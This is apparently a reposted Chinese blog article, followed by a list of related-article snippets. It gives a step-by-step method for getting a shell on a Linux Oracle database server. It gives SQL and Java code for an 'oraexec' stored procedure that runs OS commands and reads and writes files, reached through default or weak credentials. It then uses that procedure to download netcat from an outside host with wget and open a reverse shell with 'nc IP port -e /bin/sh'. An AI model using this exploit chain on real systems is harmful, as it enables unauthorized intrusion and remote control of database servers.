Linux下Oracle获取shell

最新推荐文章于 2022-02-05 22:27:32 发布
最新推荐文章于 2022-02-05 22:27:32 发布
阅读量73 收藏
点赞数
文章标签: shell java 操作系统
原文链接:http://www.cnblogs.com/baogg/articles/1991108.html
版权

很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。

而 对于Linux下的Oracle数据库入侵,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候,可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上,以下用简单 的方式获取Oracle的shell,即采用nc反弹的shell的方式。

1、Oracle数据库支持JAVA(如Windows下入侵一般)

2、通过Oracle客户端sqlplus,以sysdba用户登录(dbsnmp用户可提权至sysdba)

3、执行以下代码:
CODE_1:

java
  1. create or replace and resolve java source named "oraexec" as   
  2. import java.lang.*;   
  3. import java.io.*;   
  4. public class oraexec   
  5. {   
  6. /*   
  7. * Command execution module   
  8. */   
  9. public static void execCommand(String command) throws IOException   
  10. {   
  11. Runtime.getRuntime().exec(command);   
  12. }   
  13.   
  14. /*   
  15. * File reading module   
  16. */   
  17. public static void readFile(String filename) throws IOException   
  18. {   
  19. FileReader f = new FileReader(filename);   
  20. BufferedReader fr = new BufferedReader(f);   
  21. String text = fr.readLine();   
  22. while (text != null) {   
  23. System.out.println(text);   
  24. text = fr.readLine();   
  25. }   
  26. fr.close();   
  27. }   
  28.   
  29. /*   
  30. * File writing module   
  31. */   
  32. public static void writeFile(String filename, String line) throws IOException   
  33. {   
  34. FileWriter f = new FileWriter(filename, true); /* append */   
  35. BufferedWriter fw = new BufferedWriter(f);   
  36. fw.write(line);   
  37. fw.write("\n");   
  38. fw.close();   
  39. }   
  40. }  

============================================

CODE_2:

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';

===========================================

CODE_3:

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';

============================================

CODE_4:

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';

4、

exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc');  //写入wget nc 命令到文件getnc

exec dbms_java.set_output(2000);   //设置javareadfile

set serveroutput on;

exec javareadfile('/tmp/getnc');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/getnc'); //执行命令下载nc

exec javareadfile('/tmp/nc');   //查看nc是否下载成功

exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //写入反弹命令

exec javareadfile('/tmp/shell');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/shell'); //执行nc反弹shell,在本地nc监听就能得到shell,如果不行,请确认防火墙

转载于:https://www.cnblogs.com/baogg/articles/1991108.html

weixin_30338481
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下批量执行oracle脚本的shell脚本
04-05
NULL 博文链接:https://bicashy.iteye.com/blog/1522713
Oracle Linux下安装
09-08
总的来说,Oracle Linux下的Oracle数据库安装是一个涉及多步骤、多层面的过程,需要对操作系统、用户管理和数据库管理有深入的理解。在安装过程中,必须谨慎操作,遵循最佳实践,确保系统的稳定性和安全性。
oracle低权限下获取shell
weixin_34355715的博客
07-21 134
转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<<ORACLE 建立数据文件WriteWebShell>>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code: crea...
利用oracleShell
收集盒 Book box
09-02 832
SQL> create tablespace kjtest datafile 'e:\website\kj.asp'  size 100k nologging ;  复制代码 这样就创建了Table 空间。 这里需要注意的是oracle的Table,最小单位是100K。
linux下远程定时备份oracle数据库
03-02
Linux环境下,远程定时备份Oracle数据库是一项至关重要的任务,它能确保数据的安全性和业务的连续性。Oracle数据库作为企业级的数据库管理系统,其备份与恢复策略必须严谨且可靠。以下将详细阐述如何在没有安装...
shell脚本卸载数据模板(Oracle
06-29
脚本中包括数据卸载,编码转换(GBK转UTF8),获取批次号(不同批次卸数使用),尾行加行数,FTP上传、以及增加注释了文件切割成多个文件的语句(针对大文件进行切割使用)。 注意:配置/etl/shell/config中的环境...
LinuxOracle常用操作
10-01
### LinuxOracle常用操作知识点详解 #### 一、概述 在Linux环境下管理Oracle数据库时,掌握一系列常用的命令是非常重要的。这些命令可以帮助我们有效地监控、维护和优化数据库性能。本文将详细介绍LinuxOracle...
linux shell 查询oracle数据库中的值 并返回
05-01
Linux环境中,shell脚本是一种强大的工具,可以与操作系统进行交互并执行各种任务。当我们需要查询Oracle数据库中的数据并返回结果时,可以结合shell脚本和Oracle的SQL命令行工具来实现。这篇博客(虽然链接不可用...
Oracle shell安装,Linux 安装Oracleshell脚本
weixin_30444573的博客
04-04 179
Linux平台下面安装Oracle,要做好多的准备工作。比如建立user,修改环境变量,一些oracle所需的参数。现在整理成shell脚本,以在Linux平台下面安装Oracle,要做好多的准备工作。比如建立user,,修改环境变量,一些oracle所需的参数。现在整理成shell脚本,以方便安装。一、创建安装脚本vi install.sh#/bin/bash. ./adduser.sh. ....
Oracle shell安装,Linux安装Oracleshell脚本
weixin_30260191的博客
04-04 239
Linux平台下面安装Oracle,要做好多的准备工作。比如建立user,修改环境变量,一些oracle所需的参数。现在整理成shell脚本,以在Linux平台下面安装Oracle,要做好多的准备工作。比如建立user,,修改环境变量,一些oracle所需的参数。现在整理成shell脚本,以方便安装。一、创建安装脚本vi install.sh#/bin/bash. ./adduser.sh. ....
oracle 最小权限,oracle低权限下获取shell
weixin_39625305的博客
04-06 117
转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code:create global temporary table BLUEUSER.dirlist(filenam...
oracleshell命令,LinuxShell脚本与Oracle交互脚本
weixin_33721696的博客
04-02 120
wc -l 7*.txt. ~/.bash_profilecd /data/intfdata/ba/gtdatadatabase_pass=`cat /home/gmcc/database_work.conf`---签约sqluldr user=$database_pass query="select distinct servnumber||'||||' from tb6_lh_hhf_gj_t...
linux spool 脚本,Unix/LinuxOracle相关Shell
weixin_39631344的博客
05-06 117
1、执行Oracle数据库中的存储过程proc.sh脚本内容(IBM的AIX环境下)ORACLE_BASE=/oracle;export ORACLE_BASEORACLE_HOME=$ORACLE_BASE/product/10.2.0;export ORACLE_HOMEORACLE_SID=commdb;export ORACLE_SID$ORACLE_HOME/bin/sqlplus cf...
Oracle数据库拿shell,shell调用Oracle数据库方法
weixin_36058866的博客
04-06 627
shell 调用Oracle数据库方法 addStudent(){ LOGPATHFILE=/home/test/user/xxxx/log/bdfWarn.log UID=$1 UNAME=$2 UAGE=$3 USEshell 调用Oracle数据库方法addStudent(){LOGPATHFILE=/home/test/user/xxxx/log/bdfWarn.logUID=$1UNAM...
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5472
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
Oracle 注入不能出网时获得一个交互式 Shell
weixin_43639741的博客
04-17 1488
不会入侵渗透,水一篇低水平的文章,只写思路,有错误请指点。 场景/问题 Oracle 注入可利用 Java 执行命令,但数据库服务器不能连外网,如何获取一个可交互的 Shell? 反弹 Shell 的原理 一般在反弹 Shell 前,我们需要利用 nc 监听一个本地端口。然后在目标主机上启动一个 Shell 进程,并创建一个 socket 连接到之前 nc 监听的本地端口,将该 Shell 进程的...
Linux服务器数据库监控:Shell脚本实现Oracle、MySQL预警与邮件通知
Linux环境下,针对Oracle数据库,首先需要创建一个shell脚本(`monitor_dblog.sh`),用于连接数据库并执行SQL脚本(`db_monitor.sql`),这个SQL脚本会收集数据库的监控信息并将其输出到一个日志文件中。例如,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值